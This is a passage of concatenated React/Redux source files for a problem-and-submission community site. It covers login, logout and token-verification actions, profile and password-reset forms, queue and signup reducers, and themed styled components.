		})
		.then(response => {
			// TODO: verify 401 status as decide between server and client error
			localStorage.setItem('token', JSON.stringify(response.token));
			dispatch(success(response.user, response.token))
		}).catch(error => {
			dispatch(invalid_credentials(error))
		})
	};
	function request(user) { return { type: authConstants.LOGIN_REQUEST, user: user } }
	function success(user, token) { return { type: authConstants.LOGIN_SUCCESS, user, token} }
	function invalid_credentials(error) { return { type: authConstants.LOGIN_INVALID_CREDENTIALS, error: error, messageType: messageType.ERROR } }
}
/**
 * Fire-and-forget server-side logout (network errors only logged), then
 * clear the persisted token and synchronously return the LOGOUT action.
 */
function logout(token) {
	// Earlier draft of the request, kept for reference:
	/*
	fetch(appConfig.backendUrl + "/logout", {
		method: 'POST',
		headers: { 'Content-Type': 'application/json' },
		body: JSON.stringify({ username, password })
	})
	*/
	fetch(appConfig.backendUrl + "/logout", {
		method: 'POST',
		headers: {
			'Content-Type' : 'application/json',
			'Authorization' : 'Bearer ' + token
		}
	}).catch(error => console.log(error));
	localStorage.removeItem('token')
	return { type: authConstants.LOGOUT };
}
/**
 * Thunk: validate `token` against the backend. Missing token maps to a
 * plain LOGOUT action; a valid token refreshes user/token in the store;
 * any fetch/HTTP error dispatches TOKEN_EXPIRED.
 */
function verify(token) {
	if (!token) {
		return no_token()
	}
	return dispatch => {
		dispatch(request(token))
		fetch(appConfig.backendUrl + "/verify/login", {
			method: 'POST',
			headers: {
				'Content-Type' : 'application/json',
				'Authorization' : 'Bearer ' + token
			}
		}).then(response => {
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response;
				throw error;
			}
		}).then(response => {
			return response.json()
		}).then(response => {
			dispatch(success(response.user, response.token))
		}
		).catch(error => {
			dispatch(token_expired())
		})
	}
	function request(token) { return { type: authConstants.TOKEN_VERIFY_REQUEST, token }}
	function success(user, token) { return { type: authConstants.TOKEN_VERIFIED, user, token} }
	function token_expired() { return { type: authConstants.TOKEN_EXPIRED } }
	function no_token() { return {type: authConstants.LOGOUT} }
}
<file_sep>/src/actions/content/profile/personalInformationPage.jsx
import { appConfig } from '../../../appConfig'
import { personalInformationPageConstants } from '../../../constants/content/profile/personalInformationPage'
import { messageType } from '../../../constants/misc/backendMessageTypes'
// Action creator: record that `form` ('email' | 'username' | 'password' |
// 'names') was submitted with `values`, pending password confirmation.
function filled(form, values) {
	return { type: personalInformationPageConstants.REQUEST_FORM_FILLED, form, values }
}
/**
 * Thunk: re-check the user's password with the backend. On success, emit the
 * *_REQUEST action for whichever change form is pending so that flow can
 * proceed; on any error emit CONFIRM_PASSWORD_FAILED.
 */
function confirmPassword(password, form, authToken) {
	return dispatch => {
		dispatch(request());
		fetch(appConfig.backendUrl + "/confirmPassword", {
			method: 'POST',
			headers: {
				'Content-Type': 'application/json',
				'Authorization': 'Bearer ' + authToken
			},
			body: JSON.stringify({password})
		}).then(response => {
			// NOTE: refactor this
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(res => {
			dispatch(success(form))
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
	function request() { return { type: personalInformationPageConstants.CONFIRM_PASSWORD_REQUEST } }
	// Map the pending form name to the corresponding change-request action.
	function success(form) {
		switch(form) {
			case 'email':
				return {
					type: personalInformationPageConstants.CHANGE_EMAIL_REQUEST
				}
			case 'username':
				return {
					type: personalInformationPageConstants.CHANGE_USERNAME_REQUEST
				}
			case 'password':
				return {
					type: personalInformationPageConstants.CHANGE_PASSWORD_REQUEST
				}
			case 'names':
				return {
					type: personalInformationPageConstants.CHANGE_NAMES_REQUEST
				}
			default:
				return {
					type: personalInformationPageConstants.CONFIRM_PASSWORD_FAILED,
					message: 'idk wut happened, but suddenli form parameter is nul',
					messageType: messageType.ERROR
				}
		}
	}
	function failure(message) { return { type: personalInformationPageConstants.CONFIRM_PASSWORD_FAILED, message, messageType: messageType.ERROR } }
}
/**
 * Thunk: request an email change for the authenticated user (the backend
 * sends a confirmation link; the email is not changed immediately).
 */
function submitEmailChange(newEmail, authToken) {
	return dispatch => {
		dispatch(request());
		fetch(appConfig.backendUrl + "/u/emailChange", {
			method: 'POST',
			headers: {
				'Content-Type': 'application/json',
				'Authorization': 'Bearer ' + authToken
			},
			body: JSON.stringify({newEmail})
		}).then(response => {
			// NOTE: refactor this
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(user => {
			dispatch(success())
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
	function request() { return { type: personalInformationPageConstants.CHANGE_EMAIL_REQUEST } }
	function success() { return { type: personalInformationPageConstants.CHANGE_EMAIL_SUCCESS} }
	function failure(message) { return { type: personalInformationPageConstants.CHANGE_EMAIL_FAILED, message, messageType: messageType.ERROR } }
}
/**
 * Thunk: request a username change for the authenticated user.
 * Same request/success/failure shape as submitEmailChange.
 */
function submitUsernameChange(newUsername, authToken) {
	return dispatch => {
		dispatch(request());
		fetch(appConfig.backendUrl + "/u/usernameChange", {
			method: 'POST',
			headers: {
				'Content-Type': 'application/json',
				'Authorization': 'Bearer ' + authToken
			},
			body: JSON.stringify({newUsername})
		}).then(response => {
			// NOTE: refactor this
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(user => {
			dispatch(success())
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
	function request() { return { type: personalInformationPageConstants.CHANGE_USERNAME_REQUEST } }
	function success() { return { type: personalInformationPageConstants.CHANGE_USERNAME_SUCCESS} }
	function failure(message) { return { type: personalInformationPageConstants.CHANGE_USERNAME_FAILED, message, messageType: messageType.ERROR } }
}
/**
 * Thunk: change the authenticated user's first/last name.
 * Same request/success/failure shape as submitEmailChange.
 */
function submitNamesChange(newFirstName, newLastName, authToken) {
	return dispatch => {
		dispatch(request());
		fetch(appConfig.backendUrl + "/u/namesChange", {
			method: 'POST',
			headers: {
				'Content-Type': 'application/json',
				'Authorization': 'Bearer ' + authToken
			},
			body: JSON.stringify({newFirstName, newLastName})
		}).then(response => {
			// NOTE: refactor this
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(user => {
			dispatch(success())
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
	function request() { return { type: personalInformationPageConstants.CHANGE_NAMES_REQUEST } }
	function success() { return { type: personalInformationPageConstants.CHANGE_NAMES_SUCCESS} }
	function failure(message) { return { type: personalInformationPageConstants.CHANGE_NAMES_FAILED, message, messageType: messageType.ERROR } }
}
/**
 * Thunk: trigger a password-reset email for `user` (username or email).
 * Unauthenticated endpoint — shares the forgot-password backend route.
 * A missing `user` returns a plain failure action (inner function
 * declarations are hoisted, so `failure` is callable here).
 */
function submitPasswordChange(user) {
	if (!user) {
		return failure('Attempted request with no username/email')
	}
	return dispatch => {
		dispatch(request());
		fetch(appConfig.backendUrl + "/u/passwordReset/request", {
			method: 'POST',
			headers: { 'Content-Type': 'application/json' },
			body: JSON.stringify({user})
		}).then(response => {
			// NOTE: refactor this
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(body => {
			dispatch(success(body.user))
		}).catch(error => {
			dispatch(failure(JSON.stringify(error)))
		})
	}
	function request() { return { type: personalInformationPageConstants.CHANGE_PASSWORD_REQUEST } }
	function success(user) { return { type: personalInformationPageConstants.CHANGE_PASSWORD_SUCCESS, user} }
	function failure(message) { return { type: personalInformationPageConstants.CHANGE_PASSWORD_FAILED, message, messageType: messageType.ERROR } }
}
// Action creator: return the personal-information page to its initial state.
function reset() {
	return { type: personalInformationPageConstants.RESET }
}
// Public action-creator API for the personal-information page.
export const personalInformationPageActions = {
	filled,
	confirmPassword,
	submitEmailChange,
	submitUsernameChange,
	submitNamesChange,
	submitPasswordChange,
	reset
}
<file_sep>/src/components/routes/NonAuthRoute.jsx
import React from "react"
import { Route, Redirect } from "react-router-dom";
import history from '../../history'
// Route wrapper for pages that only make sense when logged OUT (signup,
// login, confirmation links). Logged-in users are redirected to /logout,
// remembering the original path so they can come back after logging out.
const NonAuthRoute = ({loggedIn, render, ...rest}) => {
	return (
		<Route
			{...rest}
			render={(routeProps) => {
				return loggedIn ?
					<Redirect
						to={{
							pathname: "/logout",
							state: { from: history.location.pathname }
						}}
					/>
					: render(routeProps)
				}
			}
		/>
	);
}
export default NonAuthRoute
// Redux action types for the username-change confirmation page.
export const confirmUsernameChangeConstants = {
	REQUEST: "CONFIRM_USERNAME_CHANGE_REQUEST",
	SUCCESS: "CONFIRM_USERNAME_CHANGE_SUCCESS",
	FAILED: "CONFIRM_USERNAME_CHANGE_FAILED"
}
import React from 'react'
import { reduxForm } from 'redux-form'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import Button from '../../../styled-components/defaults/Button'
// On submit, mark the 'password' form as filled so the reset flow starts.
const submit = (values, dispatch, props) => {
	const action = personalInformationPageActions.filled('password', values)
	dispatch(action)
}
// Field-less form: submitting requests a password-reset email.
let ChangePasswordForm = (props) => (
	<form onSubmit={props.handleSubmit}>
		<div>
			Password reset - email with a link will be sent
		</div>
		<Button type="submit">Send password reset link</Button>
	</form>
)
// redux-form wiring; form state lives under the personal-information slice.
ChangePasswordForm = reduxForm({
	form: 'changePassword',
	onSubmit: submit,
	getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangePasswordForm)
export default ChangePasswordForm
import { forgotPwdConstants } from '../../constants/content/forgotPwdPage'
import { appConfig } from '../../appConfig'
import { messageType } from '../../constants/misc/backendMessageTypes'
// Public action-creator API for the forgot-password page.
export const forgotPwdActions = {
	forgotPwd,
	reset
};
/**
 * Thunk: ask the backend to send a password-reset link to `user`
 * (username or email). A missing `user` returns a plain failure action.
 */
function forgotPwd(user) {
	if (!user) {
		return failed('Attempted request with no username/email')
	}
	return dispatch => {
		dispatch(request());
		fetch(appConfig.backendUrl + "/u/passwordReset/request", {
			method: 'POST',
			headers: { 'Content-Type': 'application/json' },
			body: JSON.stringify({user})
		}).then(response => {
			// NOTE: refactor this
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(body => {
			dispatch(success(body.user))
		}).catch(error => {
			dispatch(failed(JSON.stringify(error)))
		})
	}
	function request() { return { type: forgotPwdConstants.REQUEST } }
	function success(user) { return { type: forgotPwdConstants.SUCCESS, user } }
	function failed(message) { return { type: forgotPwdConstants.FAILED, message, messageType: messageType.ERROR } }
}
// Action creator: return the forgot-password page to its initial state.
function reset() {
	return { type: forgotPwdConstants.RESET }
}
<file_sep>/src/styled-components/problem/ContentInfo.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
// Buzzfeed theme: flex row with a bottom rule; the `end` prop right-aligns.
const BuzzfeedContentInfo = styled.div`
	display: flex;
	flex-wrap: wrap;
	${props => props.end && 'justify-content: flex-end;'}
	align-content: center;
	margin: 0px 2px 2px 2px;
	border-bottom: 1px solid grey;
	h3 {
		flex-grow: 1;
		margin-left: 0px;
		margin-bottom: 0px;
	}
	* {
		margin-left: 7px;
	}
`
// Tryhard theme: plain div; strip the styling-only `end` prop from the DOM.
const TryhardContentInfo = props => <div {...props} end={undefined}/>
// Render whichever themed variant the active theme selects.
const ContentInfo = props => <ThemeSelector
	buzzfeed={<BuzzfeedContentInfo {...props} />}
	tryhard={<TryhardContentInfo {...props} />}
/>
export default ContentInfo
import React from 'react'
import { boostActions } from '../../../actions/content/boost'
import { Field, reduxForm } from 'redux-form'
import FormButton from '../../../styled-components/form/FormButton'
import renderField from '../../form/RenderField'
// Form submit handler: dispatch a boost of `values.boost` points for the
// problem identified by props.problemId, authenticated via props.token.
let boost = (values, dispatch, props) => {
	const payload = { value: values.boost, problemId: props.problemId }
	dispatch(boostActions.boost(payload, props.token))
}
// redux-form field validator: reject values that don't coerce to a number.
const number = (value) => {
	if (isNaN(Number(value))) {
		return 'Must be a number'
	}
	return undefined
}
// redux-form field validator: require a strictly positive value.
const positive = (value) => {
	if (value > 0) {
		return undefined
	}
	return 'Must be a positive number'
}
// Form with a single numeric "boost" field, validated client-side.
let BoostForm = props => {
	const { handleSubmit } = props;
	return (<form onSubmit={handleSubmit}>
		<div>
			<Field name="boost" label="Boost Value" component={renderField} validate={[number, positive]} type="number" step="any" alignLeft/>
		</div>
		<FormButton type="submit" alignLeft>Boost!</FormButton>
	</form>)
}
// redux-form wiring; form state lives under the boost content slice.
BoostForm = reduxForm({
	form: 'form',
	onSubmit: boost,
	getFormState: ({content}) => content.boost.form
})(BoostForm)
export default BoostForm
<file_sep>/src/components/problem/ProblemPage/PostReplyForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import { problemPageActions } from '../../../actions/content/problemPage'
import Button from '../../../styled-components/defaults/Button'
import renderTextArea from '../../form/RenderTextArea'
// Dispatch a reply to a submission on the problem page.
const submit = (values, dispatch, props) => {
	const reply = {
		content: values.content,
		submission: props.submission,
		problem: props.problem
	}
	dispatch(problemPageActions.replySubmission(reply, props.token))
}
// Free-text reply form rendered under a submission.
let PostReplyForm = props => {
	const { handleSubmit } = props;
	return (<form onSubmit={handleSubmit}>
		<div>
			<Field name="content" component={renderTextArea} type="text"/>
		</div>
		<Button type="submit">Submit</Button>
	</form>)
}
// redux-form wiring; form state lives under the problem-page content slice.
PostReplyForm = reduxForm({
	form: 'reply',
	onSubmit: submit,
	getFormState: ({content}) => content.problemPage.form
})(PostReplyForm)
export default PostReplyForm
export default PostReplyForm<file_sep>/src/reducers/content/signupPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { signupConstants, signupStages } from '../../constants/content/signUpPage'
import { appConfig } from '../../appConfig'
// Sign-up starts on the form stage.
const initialState = {
	stage: signupStages.SUBMITTING_FORM
}
// Reducer for the sign-up page stage + status message. On SUCCESS the
// message differs depending on whether a real (production) mail service is
// configured or the demo ethereal.email inbox must be used instead.
const signupPageReducer = (state = initialState, action) => {
	switch (action.type) {
		case signupConstants.REQUEST:
			return {stage: signupStages.SUBMITTING_FORM, message: "Waiting for server response"}
		case signupConstants.SUCCESS:
			return {
				stage: signupStages.COMPLETED,
				message: {
					message: appConfig.productionMail ? "Confermation link sent ;) pls check ur email adress, YUH!" : "Ok now that you've regoostered, this is a demo version that uses only testing mail service for user receiving emails, since we cannot afford SMTP server.\nThat means, to complete the process",
					steps: appConfig.productionMail ? [] : [
						"go to \"https://ethereal.email\"",
						"log in with following credentials:\n\tusername=\"<EMAIL>\",\n\tpassword=\"<PASSWORD>\"",
						"in section messages should be your email, i.e. addressed to \"" + action.user.username + "\" with email adress \"" + action.user.email + "\""
					]
				},
				messageType: action.messageType
			}
		case signupConstants.FAILED:
			return {stage: signupStages.SUBMITTING_FORM, message: action.message, messageType: action.messageType }
		case signupConstants.RESET:
			return initialState
		default:
			return state
	}
}
// The form sub-state is handled entirely by redux-form's own reducer.
const signupFormReducer = reducer;
export default combineReducers({
	page: signupPageReducer,
	form: signupFormReducer
})
<file_sep>/src/components/profile/PersonalInformationPage/ChangeEmailForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import { signupActions } from '../../../actions/content/signup'
import Button from '../../../styled-components/defaults/Button'
// redux-form sync validation: the new email must be non-empty.
const validate = (values) => {
	return values.email ? {} : { email: 'Required' }
}
// On submit, hand the form values to the personal-information flow,
// tagged with the form they came from ('email').
const submit = (values, dispatch, props) => {
	const action = personalInformationPageActions.filled('email', values)
	dispatch(action)
}
// Presentational form: a single "email" field plus a submit button.
let ChangeEmailForm = (props) => (
	<form onSubmit={props.handleSubmit}>
		Change Email
		<Field name="email" component={renderField} type="text" placeholder="New Email"/>
		<Button type="submit">Submit</Button>
	</form>
)
// redux-form wiring: sync-validate locally, async-validate the email on
// blur via the signup validator; form state lives under the
// personal-information page slice.
ChangeEmailForm = reduxForm({
	form: 'changeEmail',
	validate,
	onSubmit: submit,
	asyncBlurFields: ['email'],
	asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
	getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangeEmailForm)
export default ChangeEmailForm;
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
// Buzzfeed theme: inline meta cell; the `grow` prop makes it flex-grow.
const BuzzfeedTransactionBoxMetaSection = styled.span`
	${props => props.grow && 'flex-grow: 1;'}
	margin-right: 10px;
`
// Tryhard theme: plain span; strip the styling-only `grow` prop from the DOM.
const TryhardTransactionBoxMetaSection = props => <span {...props} grow={undefined}/>
// Render whichever themed variant the active theme selects.
const TransactionBoxMetaSection = props => <ThemeSelector
	buzzfeed={<BuzzfeedTransactionBoxMetaSection {...props} />}
	tryhard={<TryhardTransactionBoxMetaSection {...props} />}
/>
export default TransactionBoxMetaSection
import React from 'react';
import ProfileSidebar from './ProfileSidebar'
import { connect } from 'react-redux'
import InfiniteScroll from 'react-infinite-scroller';
import TransactionBox from './TransactionPage/TransactionBox'
import { transactionPageActions } from '../../actions/content/profile/transactionPage'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import TransactionBoxWrapper from '../../styled-components/profile/TransactionBoxWrapper'
// Bind transaction-page action creators; the auth token comes from ownProps.
const mapDispatchToProps = (dispatch, ownProps) => {
	return {
		loadPage: (page) => dispatch(transactionPageActions.setActivePage(ownProps.token, page)),
		reset: () => dispatch(transactionPageActions.reset())
	}
}
// Map the transaction-page slice into props, flattening the per-page
// `entries` arrays into one list; ownProps (user, token) win on conflicts.
const mapStateToProps = (state, ownProps) => {
	const pageState = state.content.profile.transactionPage
	const flatEntries = pageState.entries.reduce((all, page) => all.concat(page), [])
	return { ...pageState, entries: flatEntries, ...ownProps }
}
// Infinite-scrolling list of a user's transactions. Loads page 1 on mount
// and clears the page slice on unmount.
class TransactionPage extends React.Component {
	componentWillUnmount() {
		this.props.reset()
	}
	componentDidMount() {
		this.props.loadPage(1)
	}
	render() {
		const empty = this.props.entries.length === 0
		// Empty/loading state: same chrome, placeholder headline.
		if (empty) {
			return (
				<PageDiv>
					<ProfileSidebar baseUrl={'/u/' + this.props.user} auth_view/>
					<ContentDiv sidebar>
						<CenteredDiv fullWidth>
							<h3>{this.props.loading ? "Loading" : "User " + this.props.user + " has yet no transactions"}</h3>
						</CenteredDiv>
					</ContentDiv>
				</PageDiv>
			)
		}
		return (
			<PageDiv>
				<ProfileSidebar baseUrl={'/u/' + this.props.user} auth_view/>
				<ContentDiv sidebar>
					<CenteredDiv fullWidth>
						<h3>{"Transactions of user " + this.props.user}</h3>
					</CenteredDiv>
					<TransactionBoxWrapper>
						<InfiniteScroll
							pageStart={1}
							loadMore={() => {
								this.props.loadPage(this.props.paging.page + 1)
							}}
							hasMore={this.props.paging.hasMore}
							loader={<div className="loader" key={0}>Loading ...</div>}
						>
							<ul>
								{
								this.props.entries.map((p,index) => (
									<li key={index}><TransactionBox {...p}/></li>
								))}
							</ul>
						</InfiniteScroll>
					</TransactionBoxWrapper>
				</ContentDiv>
			</PageDiv>
		)
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(TransactionPage);
<file_sep>/src/components/profile/PersonalInformationPage/ChangeNamesForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import Button from '../../../styled-components/defaults/Button'
// Hands the entered name values to the personal-information flow via the
// `filled` action; the page reducer decides what happens next.
const submit = (values, dispatch, props) => {
	dispatch(personalInformationPageActions.filled('names',values))
}
// First/last name change form; no synchronous validation is attached here.
let ChangeNamesForm = (props) => (
	<form onSubmit={props.handleSubmit}>
		<div>
			Change Names
			<Field name="firstName" component={renderField} type="text" placeholder="<NAME>"/>
			<Field name="lastName" component={renderField} type="text" placeholder="<NAME>"/>
		</div>
		<Button type="submit">Submit</Button>
	</form>
)
ChangeNamesForm = reduxForm({
	form: 'changeNames',
	onSubmit: submit,
	// Form state lives under the personal-information page slice, not the
	// default top-level `form` reducer.
	getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangeNamesForm)
export default ChangeNamesForm
// Redux action types for the scoreboard statistics page:
// request/success/failed triples for page loads, user search, and the
// total user count, plus a reset for unmount.
export const scoreboardPageConstants = {
	LOAD_PAGE_REQUEST: 'SCOREBOARD_PAGE_LOAD_PAGE_REQUEST',
	LOAD_PAGE_SUCCESS: 'SCOREBOARD_PAGE_LOAD_PAGE_SUCCESS',
	LOAD_PAGE_FAILED: 'SCOREBOARD_PAGE_LOAD_PAGE_FAILED',
	USER_SEARCH_REQUEST: 'SCOREBOARD_PAGE_USER_SEARCH_REQUEST',
	USER_SEARCH_SUCCESS: 'SCOREBOARD_PAGE_USER_SEARCH_SUCCESS',
	USER_SEARCH_FAILED: 'SCOREBOARD_PAGE_USER_SEARCH_FAILED',
	USER_COUNT_REQUEST: 'SCOREBOARD_PAGE_USER_COUNT_REQUEST',
	USER_COUNT_SUCCESS: 'SCOREBOARD_PAGE_USER_COUNT_SUCCESS',
	USER_COUNT_FAILED: 'SCOREBOARD_PAGE_USER_COUNT_FAILED',
	RESET: 'SCOREBOARD_PAGE_RESET'
}
import { queuePageConstants } from '../../constants/content/queuePage'
const defaultQueueState = {
	entries: [],
	paging: {
		page: 0
	}
}
const defaultState = {}
// Reducer for one queue's paged problem list.
// BUG FIXES vs the previous version:
//  - SET_ACTIVE_PAGE_SUCCESS wrote straight into state.entries; redux cannot
//    detect in-place mutation (see the note in queuePageReducer below), so
//    the array is now cloned before being updated.
//  - SET_ACTIVE_ENTRY stored the whole state object under `entries` and read
//    `state.hasMore`, which lives under `state.paging`; both now reference
//    the correct fields.
function singleQueueReducer(state = defaultQueueState, action) {
	// Pages are 1-based; a missing or out-of-range value clamps to page 1.
	const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
	switch (action.type) {
	case queuePageConstants.SET_ACTIVE_PAGE_REQUEST:
		return {
			loading: true,
			entries: state.entries,
			paging: {
				page: state.paging.page
			}
		}
	case queuePageConstants.SET_ACTIVE_PAGE_SUCCESS:
		// Copy before writing so redux sees a new array reference.
		const newEntries = [...state.entries]
		newEntries[activePage - 1] = action.data || []
		return {
			entries: newEntries.slice(0,activePage),
			paging: {
				// If there was no data, dont update
				page: (action.data && action.data.length > 0) ? activePage : state.paging.page,
				hasMore: action.hasMore
			},
		}
	case queuePageConstants.NETWORK_ERROR:
		return {
			message: action.message,
			messageType: action.messageType,
			paging: {
				...state.paging,
				hasMore: false
			},
			entries: state.entries
		}
	case queuePageConstants.SET_ACTIVE_ENTRY:
		return {
			entries: state.entries,
			paging: {
				page: activePage,
				entry: action.activeEntry,
				hasMore: state.paging.hasMore
			}
		}
	default:
		return state
	}
}
// Top-level reducer: keeps one sub-state per queue name, delegating each
// action to singleQueueReducer for the queue it targets.
// A fresh object is returned on every non-RESET action so redux detects the
// change (direct mutation of `state` is invisible to it — hard-won lesson).
export default function queuePageReducer(state = defaultState, action) {
	if (action.type === queuePageConstants.RESET) {
		return defaultState
	}
	if (!action.queue) {
		return { ...state }
	}
	const current = state[action.queue] || defaultQueueState
	return { ...state, [action.queue]: singleQueueReducer(current, action) }
}
<file_sep>/src/styled-components/problem/RepliesButtonDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ButtonDiv from '../defaults/ButtonDiv'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonDiv = styled(ButtonDiv)`
margin-left: 10%;
`
const TryhardRepliesButtonDiv = props => <button {...props} />
const RepliesButtonDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonDiv {...props} />}
tryhard={<TryhardRepliesButtonDiv {...props} />}
/>
export default RepliesButtonDiv;
<file_sep>/src/components/queue/QueueSidebar.jsx
import React from 'react';
import { connect } from 'react-redux'
import QueueSidebarEntries from './QueueSidebarEntries'
import { globalActions } from '../../actions/global'
import SidebarDiv from '../../styled-components/sidebars/Sidebar'
import HierarchicalListDiv from '../../styled-components/sidebars/HierarchicalListDiv'
import CollapsedSidebarDiv from '../../styled-components/sidebars/CollapsedSidebar'
import QueueDropdown from './QueueDropdown'
// Only the queue hierarchy is read from global state.
const mapStateToProps = (state) => {
	const { hierarchy } = state.global
	return { hierarchy }
}
// Thunks fetching the flat queue list and the display hierarchy.
const mapDispatchToProps = (dispatch) => ({
	loadHierarchy: () => dispatch(globalActions.hierarchy()),
	loadLinQueues: () => dispatch(globalActions.queues()),
})
// Navigation sidebar listing problem queues. Renders both the hierarchical
// (wide-screen) and dropdown (collapsed) variants; CSS decides which shows.
class QueueSidebar extends React.Component {
	componentDidMount() {
		// Fetch the flat queue list and the hierarchy used for display.
		this.props.loadLinQueues()
		this.props.loadHierarchy()
	}
	render() {
		const hierarchicalEntries = <QueueSidebarEntries baseUrl={this.props.baseUrl || '/q'} queues={this.props.hierarchy} />
		const dropdownEntries = <QueueDropdown baseUrl={this.props.baseUrl || '/q'}/>
		if (this.props.reuse) {
			// `reuse`: another sidebar embeds this one (e.g. StatisticsSidebar),
			// so skip the outer SidebarDiv wrapper.
			return (
				<div>
					<HierarchicalListDiv>
						{hierarchicalEntries}
					</HierarchicalListDiv>
					<CollapsedSidebarDiv>
						{dropdownEntries}
					</CollapsedSidebarDiv>
				</div>
			)
		}
		return (
			<div>
				<CollapsedSidebarDiv>
					{dropdownEntries}
				</CollapsedSidebarDiv>
				<SidebarDiv>
					<HierarchicalListDiv>
						{hierarchicalEntries}
					</HierarchicalListDiv>
				</SidebarDiv>
			</div>
		)
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(QueueSidebar)
import { premiumPageConstants } from '../../../constants/content/profile/premiumPage'
// UI state for the premium subscription page: a flag plus the blurb shown.
const defaultState = {
	premiumActive: false,
	text: 'Sumscribe to premium'
}
// Toggles the premium flag and swaps the accompanying message text.
function premiumPageReducer(state=defaultState, action) {
	if (action.type === premiumPageConstants.SUBSCRIBE) {
		return {
			premiumActive: true,
			text: 'You\'ve just sumscribed to premium, it duznt really contain any benefits, click down below to unsubscribe for special reward'
		}
	}
	if (action.type === premiumPageConstants.UNSUBSCRIBE) {
		return {
			premiumActive: false,
			text: 'You\'ve just unsubscribed from premium, hopw you had fun.. click down below to sumscrible again'
		}
	}
	return state
}
export default premiumPageReducer
import React from 'react';
import { connect } from 'react-redux';
import MarkdownRender from '../../form/MarkdownRender'
import PostSubmissionForm from './PostSubmissionForm'
import { problemPageActions } from '../../../actions/content/problemPage'
// Pass the submission form state through when it exists; `ownProps` keys are
// spread last, so a `form` prop supplied by the owner takes precedence.
const mapStateToProps = (state, ownProps) => {
	const submission = state.content.problemPage.form.submission
	if (!submission) {
		return ownProps
	}
	return { form: submission, ...ownProps }
}
// Thunk for posting a new submission to the problem.
const mapDispatchToProps = (dispatch, ownProps) => ({
	postSubmission: (submission, token) => dispatch(problemPageActions.postSubmission(submission, token)),
})
// Submission form plus a live markdown preview of the content being typed.
class PostSubmissionComponent extends React.Component {
	render() {
		const token = this.props.token
		const sForm = this.props.form
		const problemId = this.props.problemId
		return (
			<div>
				<PostSubmissionForm token={token} problem={problemId} />
				{
					// Preview only once redux-form has captured some values.
					sForm && sForm.values && (
						<div>
							{(sForm.values.content) && <p>Preview</p>}
							<MarkdownRender source={sForm.values.content} />
						</div>
					)
				}
			</div>
		)
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(PostSubmissionComponent)
<file_sep>/src/constants/auth.jsx
// Redux action types for the authentication flow: login lifecycle, logout,
// and token verification/expiry.
export const authConstants = {
	LOGIN_REQUEST: 'AUTH_LOGIN_REQUEST',
	LOGIN_SUCCESS: 'AUTH_LOGIN_SUCCESS',
	LOGIN_FAILURE: 'AUTH_LOGIN_FAILURE',
	LOGIN_INVALID_CREDENTIALS: 'AUTH_LOGIN_INVALID_CREDENTIALS',
	LOGOUT: 'AUTH_LOGOUT',
	TOKEN_VERIFY_REQUEST: 'AUTH_TOKEN_VERIFY_REQUEST',
	TOKEN_VERIFIED: 'AUTH_TOKEN_VERIFIED',
	TOKEN_EXPIRED: 'AUTH_TOKEN_EXPIRED'
};
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonBlock = styled.div`
display: flex;
`
const TryhardRepliesButtonBlock = props => <button {...props} />
const RepliesButtonBlock = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonBlock {...props} />}
tryhard={<TryhardRepliesButtonBlock {...props} />}
/>
export default RepliesButtonBlock;
<file_sep>/src/components/problem/ProblemPage.jsx
import React from 'react';
import { connect } from 'react-redux';
import InfiniteScroll from 'react-infinite-scroller';
import QueueSidebar from '../queue/QueueSidebar'
import Problem from './ProblemPage/Problem'
import Submission from './ProblemPage/Submission'
import PostSubmission from './ProblemPage/PostSubmission'
import { problemPageActions } from '../../actions/content/problemPage'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import ProblemDiv from '../../styled-components/problem/ProblemDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
// Select the problem page slice, exposing only scalar facts about the
// problem (never the submission entries map — see the cyclic-update note in
